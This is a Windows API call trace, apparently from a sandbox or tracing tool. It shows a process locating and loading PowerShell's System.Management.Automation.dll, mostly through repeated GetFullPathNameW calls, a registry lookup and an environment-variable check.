[0081.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.218] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x10d438 | out: phkResult=0x10d438*=0x308) returned 0x0
[0081.219] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d3bc, lpData=0x0, lpcbData=0x10d3b8*=0x0 | out: lpType=0x10d3bc*=0x1, lpData=0x0, lpcbData=0x10d3b8*=0x56) returned 0x0
[0081.219] CoTaskMemAlloc (cb=0x5a) returned 0x24d7c0
[0081.219] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x10d38c, lpData=0x24d7c0, lpcbData=0x10d388*=0x56 | out: lpType=0x10d38c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x10d388*=0x56) returned 0x0
[0081.219] CoTaskMemFree (pv=0x24d7c0)
[0081.219] RegCloseKey (hKey=0x308) returned 0x0
[0081.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cea0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cdf0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10ce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.219] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.243] CoTaskMemAlloc (cb=0x104) returned 0x229ec0
[0081.243] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x229ec0, nSize=0x80 | out: lpBuffer="") returned 0x0
[0081.243] CoTaskMemFree (pv=0x229ec0)
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.244] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.245] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.246] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.247] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bdd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.252] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10be10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
[0081.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x10bd60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
